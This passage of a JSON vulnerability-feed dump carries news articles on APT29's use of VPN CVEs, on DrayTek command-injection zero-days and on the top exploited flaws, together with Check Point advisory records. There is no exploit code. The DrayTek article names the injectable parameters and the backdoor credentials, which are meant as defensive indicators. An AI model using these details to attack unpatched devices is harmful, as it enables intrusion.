victim devices and networks \u2014 \n\n * [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) \\- Fortinet FortiGate VPN\n * [**CVE-2019-9670**](<https://nvd.nist.gov/vuln/detail/CVE-2019-9670>) \\- Synacor Zimbra Collaboration Suite\n * [**CVE-2019-11510**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) \\- Pulse Secure Pulse Connect Secure VPN\n * [**CVE-2019-19781**](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) \\- Citrix Application Delivery Controller and Gateway \n * [**CVE-2020-4006**](<https://nvd.nist.gov/vuln/detail/CVE-2020-4006>) \\- VMware Workspace ONE Access\n\nIn a statement shared with The Hacker News, Pulse Secure said the issue identified by the NSA concerns a flaw that was patched on [legacy deployments in April 2019](<https://thehackernews.com/2020/04/pulse-secure-vpn-vulnerability.html>), and that \"customers who followed the instructions in a Pulse Secure security advisory issued at that time have properly protected their systems and mitigated the threat.\"\n\n\"We see what Russia is doing to undermine our democracies,\" said U.K. Foreign Secretary Dominic Raab. \"The U.K. and U.S. are calling out Russia's malicious behaviour, to enable our international partners and businesses at home to better defend and prepare themselves against this kind of action.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-04-15T16:55:00", "type": "thn", "title": "US Sanctions Russia and Expels 10 Diplomats Over SolarWinds Cyberattack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670", "CVE-2020-4006"], "modified": "2021-06-04T10:27:04", "id": "THN:461B7AEC7D12A32B4ED085F0EA213502", "href": "https://thehackernews.com/2021/04/us-sanctions-russia-and-expels-10.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:18", "description": "[![](https://thehackernews.com/images/-aP3rCXOUpiQ/YIfVcfAWodI/AAAAAAAACX8/f_RfGI2QOewvk7Zu4AaGOKQyirlBpfKfACLcBGAsYHQ/s0/russian-hackers.jpg)](<https://thehackernews.com/images/-aP3rCXOUpiQ/YIfVcfAWodI/AAAAAAAACX8/f_RfGI2QOewvk7Zu4AaGOKQyirlBpfKfACLcBGAsYHQ/s0/russian-hackers.jpg>)\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA), Department of Homeland Security (DHS), and the Federal Bureau of Investigation (FBI) on Monday published a new joint advisory as part of their latest attempts to expose the tactics, techniques, and procedures (TTPs) adopted by the Russian Foreign Intelligence Service (SVR) in its attacks targeting the U.S and foreign entities.\n\nBy employing \"stealthy intrusion tradecraft within compromised networks,\" the intelligence agencies [said](<https://us-cert.cisa.gov/ncas/current-activity/2021/04/26/fbi-dhs-cisa-joint-advisory-russian-foreign-intelligence-service>), \"the SVR activity\u2014which includes the recent [SolarWinds Orion supply chain compromise](<https://thehackernews.com/2021/04/researchers-find-additional.html>)\u2014primarily targets government networks, think tank and policy analysis organizations, and information technology companies and seeks to gather intelligence information.\"\n\nThe cyber actor is also being tracked under different monikers, including Advanced Persistent Threat 29 (APT29), the Dukes, CozyBear, and Yttrium. The development comes as the U.S. sanctioned Russia and [formally pinned](<https://thehackernews.com/2021/04/us-sanctions-russia-and-expels-10.html>) the SolarWinds hack and related cyberespionage campaign to government operatives working for SVR.\n\n[APT29](<https://malpedia.caad.fkie.fraunhofer.de/actor/apt_29>), since emerging on the threat landscape in 2013, has been tied to a number of attacks orchestrated with an aim to gain access to victim networks, move within victim environments undetected, and extract sensitive information. But in a noticeable shift in tactics in 2018, the actor moved from deploying malware on target networks to striking cloud-based email services, a fact borne by the SolarWinds attack, wherein the actor leveraged Orion binaries as an intrusion vector to exploit Microsoft Office 365 environments.\n\nThis similarity in post-infection tradecraft with other SVR-sponsored attacks, including in the manner the adversary laterally moved through the networks to obtain access to email accounts, is said to have played a huge role in attributing the SolarWinds campaign to the Russian intelligence service, despite a notable departure in the method used to gain an initial foothold.\n\n\"Targeting cloud resources probably reduces the likelihood of detection by using compromised accounts or system misconfigurations to blend in with normal or unmonitored traffic in an environment not well defended, monitored, or understood by victim organizations,\" the agency noted.\n\nAmong some of the other tactics put to use by APT29 are password spraying (observed during a 2018 compromise of a large unnamed network), exploiting zero-day flaws against virtual private network appliances (such as [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)) to obtain network access, and deploying a Golang malware called [WELLMESS](<https://blogs.jpcert.or.jp/en/2018/07/malware-wellmes-9b78.html>) to plunder [intellectual property](<https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmess-analysis-command-control.html>) from multiple organizations involved in COVID-19 vaccine development.\n\nBesides CVE-2019-19781, the threat actor is known to gain initial footholds into victim devices and networks by leveraging [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>), [CVE-2019-9670](<https://nvd.nist.gov/vuln/detail/CVE-2019-9670>), [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>), and [CVE-2020-4006](<https://nvd.nist.gov/vuln/detail/CVE-2020-4006>). Also in the mix is the practice of obtaining virtual private servers via false identities and cryptocurrencies, and relying on temporary VoIP telephone numbers and email accounts by making use of an anonymous email service called cock.li.\n\n\"The FBI and DHS recommend service providers strengthen their user validation and verification systems to prohibit misuse of their services,\" the advisory read, while also urging businesses to secure their networks from a compromise of trusted software.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-04-27T09:14:00", "type": "thn", "title": "FBI, CISA Uncover Tactics Employed by Russian Intelligence Hackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670", "CVE-2020-4006"], "modified": "2021-04-28T06:42:30", "id": "THN:91A2A296EF8B6FD5CD8B904690E810E8", "href": "https://thehackernews.com/2021/04/fbi-cisa-uncover-tactics-employed-by.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:32", "description": "[![enterprise network security](https://thehackernews.com/images/-Z_aTWSdaH3I/Xn5uoGxc-nI/AAAAAAAA2mQ/5EcPBIwVTiMspvURwUA6ipAwRq2Y0if6QCLcBGAsYHQ/s728-e100/enterprise-network-security.jpg)](<https://thehackernews.com/images/-Z_aTWSdaH3I/Xn5uoGxc-nI/AAAAAAAA2mQ/5EcPBIwVTiMspvURwUA6ipAwRq2Y0if6QCLcBGAsYHQ/s728-e100/enterprise-network-security.jpg>)\n\nCybersecurity researchers with Qihoo 360's NetLab today unveiled details of two recently spotted zero-day cyberattack campaigns in the wild targeting enterprise-grade networking devices manufactured by Taiwan-based DrayTek. \n \nAccording to the [report](<https://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/>), at least two separate groups of hackers exploited two critical remote command injection vulnerabilities (**CVE-2020-8515**) affecting DrayTek Vigor enterprise switches, load-balancers, routers and VPN gateway devices to eavesdrop on network traffic and install backdoors. \n \nThe zero-day attacks started somewhere at the end of last November or at the beginning of December and are potentially still ongoing against thousands of publicly exposed **DrayTek switche**s, **Vigor 2960, 3900, 300B** devices that haven't yet been patched with the latest [firmware updates](<https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-\$cve-2020-8515\$/>) released last month. \n \nThe zero-day vulnerabilities in question can be exploited by any unauthorized remote attackers to inject and execute arbitrary commands on the system, as also [detailed](<https://www.skullarmy.net/2020/01/draytek-unauthenticated-rce-in-draytek.html>) by a separate researcher on his blog. \n \n\n\n[![router switch vpn hacking](https://thehackernews.com/images/-DRxfF61iipo/Xn5pKPGZFXI/AAAAAAAA2l8/i4zTHgnWUvwCZFYZ1zp7vLAb3_s-gtAhwCLcBGAsYHQ/s728-e100/router-switch-vpn-hacking.jpg)](<https://thehackernews.com/images/-DRxfF61iipo/Xn5pKPGZFXI/AAAAAAAA2l8/i4zTHgnWUvwCZFYZ1zp7vLAb3_s-gtAhwCLcBGAsYHQ/s728-e100/router-switch-vpn-hacking.jpg>)\n\n \n\"The two 0-day vulnerability command injection points are keyPath and rtick, located in the /www/cgi-bin/mainfunction.cgi, and the corresponding Web Server program is /usr/sbin/lighttpd,\" the report says. \n \n\n\n[![DrayTek hacking](https://thehackernews.com/images/-c5Tx0EJ_oWs/Xn5pfYEbGaI/AAAAAAAA2mE/X0ifY4aD5ic8XJ2PYH3pofnfuJ5nNVFdQCLcBGAsYHQ/s728-e100/malware-attack.jpg)](<https://thehackernews.com/images/-c5Tx0EJ_oWs/Xn5pfYEbGaI/AAAAAAAA2mE/X0ifY4aD5ic8XJ2PYH3pofnfuJ5nNVFdQCLcBGAsYHQ/s728-e100/malware-attack.jpg>)\n\n \nNetLab researchers have not yet attributed both attacks to any specific group, but it did confirm that while the first group simply spied on the network traffic, the second group of attackers used rtick command injection vulnerability to create: \n \n\n\n * the web-session backdoor that never expires,\n * SSH backdoor on TCP ports 22335 and 32459,\n * system backdoor account with user \"wuwuhanhan\" and password \"caonimuqin.\"\n \nTo be noted, if you have just recently installed the patched firmware, or installing now, it won't remove backdoor accounts automatically in case you're already compromised. \n \n\"We recommend that DrayTek Vigor users check and update their firmware in a timely manner and check whether there is a tcpdump process, SSH backdoor account, Web Session backdoor, etc. on their systems.\" \n \n\"If you have remote access enabled on your router, disable it if you don't need it, and use an access control list if possible,\" the company suggests. \n \nThe list of affected firmware versions are as follow: \n \n\n\n * Vigor2960 < v1.5.1\n * Vigor300B < v1.5.1\n * Vigor3900 < v1.5.1\n * VigorSwitch20P2121 <= v2.3.2\n * VigorSwitch20G1280 <= v2.3.2\n * VigorSwitch20P1280 <= v2.3.2\n * VigorSwitch20G2280 <= v2.3.2\n * VigorSwitch20P2280 <= v2.3.2\n \nAffected companies and individuals are highly recommended to install the latest firmware updates to completely protect their valuable networks against malware and emerging online threats. \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-03-27T21:22:00", "type": "thn", "title": "Hackers Exploit Zero-Day Bugs in Draytek Devices to Target Enterprise Networks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8515"], "modified": "2020-03-29T18:22:23", "id": "THN:7312C296214FCDE145DA02B933FB28F6", "href": "https://thehackernews.com/2020/03/draytek-network-hacking.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:17", "description": "[![Security Vulnerabilities](https://thehackernews.com/images/-_sUoUckANJU/YQJlBsicySI/AAAAAAAADX0/BEDLvJhwqzYImk1o5ewZhnKeXxnoL0D0wCLcBGAsYHQ/s728-e1000/Security-Vulnerabilities.jpg)](<https://thehackernews.com/images/-_sUoUckANJU/YQJlBsicySI/AAAAAAAADX0/BEDLvJhwqzYImk1o5ewZhnKeXxnoL0D0wCLcBGAsYHQ/s0/Security-Vulnerabilities.jpg>)\n\nIntelligence agencies in Australia, the U.K., and the U.S. issued a joint advisory on Wednesday detailing the most exploited vulnerabilities in 2020 and 2021, once again demonstrating how threat actors are able to swiftly weaponize publicly disclosed flaws to their advantage.\n\n\"Cyber actors continue to exploit publicly known\u2014and often dated\u2014software vulnerabilities against broad target sets, including public and private sector organizations worldwide,\" the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC), the United Kingdom's National Cyber Security Centre (NCSC), and the U.S. Federal Bureau of Investigation (FBI) [noted](<https://us-cert.cisa.gov/ncas/alerts/aa21-209a>).\n\n\"However, entities worldwide can mitigate the vulnerabilities listed in this report by applying the available patches to their systems and implementing a centralized patch management system.\"\n\nThe top 30 vulnerabilities span a wide range of software, including remote work, virtual private networks (VPNs), and cloud-based technologies, that cover a broad spectrum of products from Microsoft, VMware, Pulse Secure, Fortinet, Accellion, Citrix, F5 Big IP, Atlassian, and Drupal.\n\nThe most routinely exploited flaws in 2020 are as follows -\n\n * [**CVE-2019-19781**](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) (CVSS score: 9.8) - Citrix Application Delivery Controller (ADC) and Gateway directory traversal vulnerability\n * [**CVE-2019-11510**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) (CVSS score: 10.0) - Pulse Connect Secure arbitrary file reading vulnerability\n * [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) (CVSS score: 9.8) - Fortinet FortiOS path traversal vulnerability leading to system file leak\n * [**CVE-2020-5902**](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) (CVSS score: 9.8) - F5 BIG-IP remote code execution vulnerability\n * [**CVE-2020-15505**](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>) (CVSS score: 9.8) - MobileIron Core & Connector remote code execution vulnerability\n * [**CVE-2020-0688**](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) (CVSS score: 8.8) - Microsoft Exchange memory corruption vulnerability\n * [**CVE-2019-3396**](<https://nvd.nist.gov/vuln/detail/CVE-2019-3396>) (CVSS score: 9.8) - Atlassian Confluence Server remote code execution vulnerability\n * [**CVE-2017-11882**](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882>) (CVSS score: 7.8) - Microsoft Office memory corruption vulnerability\n * [**CVE-2019-11580**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11580>) (CVSS score: 9.8) - Atlassian Crowd and Crowd Data Center remote code execution vulnerability\n * [**CVE-2018-7600**](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>) (CVSS score: 9.8) - Drupal remote code execution vulnerability\n * [**CVE-2019-18935**](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>) (CVSS score: 9.8) - Telerik .NET deserialization vulnerability resulting in remote code execution\n * [**CVE-2019-0604**](<https://nvd.nist.gov/vuln/detail/CVE-2019-0604>) (CVSS score: 9.8) - Microsoft SharePoint remote code execution vulnerability\n * [**CVE-2020-0787**](<https://nvd.nist.gov/vuln/detail/CVE-2020-0787>) (CVSS score: 7.8) - Windows Background Intelligent Transfer Service (BITS) elevation of privilege vulnerability\n * [**CVE-2020-1472**](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) (CVSS score: 10.0) - Windows [Netlogon elevation of privilege](<https://thehackernews.com/2021/02/microsoft-issues-patches-for-in-wild-0.html>) vulnerability\n\nThe list of vulnerabilities that have come under active attack thus far in 2021 are listed below -\n\n * [Microsoft Exchange Server](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>): [CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>), [CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>), [CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>), and [CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>) (aka \"ProxyLogon\")\n * [Pulse Secure](<https://thehackernews.com/2021/05/new-high-severity-vulnerability.html>): [CVE-2021-22893](<https://nvd.nist.gov/vuln/detail/CVE-2021-22893>), [CVE-2021-22894](<https://nvd.nist.gov/vuln/detail/CVE-2021-22894>), [CVE-2021-22899](<https://nvd.nist.gov/vuln/detail/CVE-2021-22899>), and [CVE-2021-22900](<https://nvd.nist.gov/vuln/detail/CVE-2021-22900>)\n * [Accellion](<https://thehackernews.com/2021/03/extortion-gang-breaches-cybersecurity.html>): [CVE-2021-27101](<https://nvd.nist.gov/vuln/detail/CVE-2021-27101>), [CVE-2021-27102](<https://nvd.nist.gov/vuln/detail/CVE-2021-27102>), [CVE-2021-27103](<https://nvd.nist.gov/vuln/detail/CVE-2021-27103>), and [CVE-2021-27104](<https://nvd.nist.gov/vuln/detail/CVE-2021-27104>)\n * [VMware](<https://thehackernews.com/2021/06/alert-critical-rce-bug-in-vmware.html>): [CVE-2021-21985](<https://nvd.nist.gov/vuln/detail/CVE-2021-21985>)\n * Fortinet: [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>), [CVE-2020-12812](<https://nvd.nist.gov/vuln/detail/CVE-2020-12812>), and [CVE-2019-5591](<https://nvd.nist.gov/vuln/detail/CVE-2019-5591>)\n\nThe development also comes a week after MITRE [published](<https://cwe.mitre.org/top25/archive/2021/2021_cwe_top25.html>) a list of top 25 \"most dangerous\" software errors that could lead to serious vulnerabilities that could be exploited by an adversary to take control of an affected system, obtain sensitive information, or cause a denial-of-service condition.\n\n\"The advisory [...] puts the power in every organisation's hands to fix the most common vulnerabilities, such as unpatched VPN gateway devices,\" NCSC Director for Operations, Paul Chichester, [said](<https://www.ncsc.gov.uk/news/global-cyber-vulnerabilities-advice>), urging the need to prioritize patching to minimize the risk of being exploited by malicious actors.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-07-29T08:21:00", "type": "thn", "title": "Top 30 Critical Security Vulnerabilities Most Exploited by Hackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-13379", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2019-5591", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-12812", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-5902", "CVE-2021-21985", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-08-04T09:03:14", "id": "THN:B95DC27A89565323F0F8E6350D24D801", "href": "https://thehackernews.com/2021/07/top-30-critical-security.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:38:28", "description": "An authentication bypass vulnerability exists in Citrix ADC and Citrix gateway. Successful exploitation of this vulnerability could allow a remote attacker to gain unauthorized access to the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 2.5}, "published": "2020-08-03T00:00:00", "type": "checkpoint_advisories", "title": "Citrix ADC Authentication Bypass (CVE-2020-8193; CVE-2020-8195; CVE-2020-8196)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196"], "modified": "2020-08-03T00:00:00", "id": "CPAI-2020-0712", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-04-19T18:31:26", "description": "A file upload vulnerability exists in Atlassian Crowd webserver. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-07-16T00:00:00", "type": "checkpoint_advisories", "title": "Atlassian Crowd Remote Code Execution (CVE-2019-11580)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11580"], "modified": "2019-07-16T00:00:00", "id": "CPAI-2019-0860", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-17T11:12:16", "description": "A remote code execution vulnerability exists in Progress Telerik UI for Asp.Net Ajax. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-03-09T00:00:00", "type": "checkpoint_advisories", "title": "Progress Telerik UI Remote Code Execution (CVE-2019-18935)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935"], "modified": "2021-09-19T00:00:00", "id": "CPAI-2019-1914", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:40:23", "description": "A remote code execution vulnerability exists in Zoho ManageEngine Desktop Central. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-03-08T00:00:00", "type": "checkpoint_advisories", "title": "Zoho ManageEngine Remote Code Execution (CVE-2020-10189)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10189"], "modified": "2020-03-08T00:00:00", "id": "CPAI-2020-0118", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:45:10", "description": "A remote code execution vulnerability has been reported in the Apache Commons Java Collections Framework. A remote unauthenticated attacker may exploit this vulnerability by sending a crafted serialized object to an application which uses the Apache Commons Java Collections Framework as part of its code path, and thereby execute arbitrary code on the server running the application.", "cvss3": {}, "published": "2015-11-19T00:00:00", "type": "checkpoint_advisories", "title": "WebLogic Apache Commons Java Collections Library Remote Code Execution (CVE-2015-4852)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-4852"], "modified": "2017-01-31T00:00:00", "id": 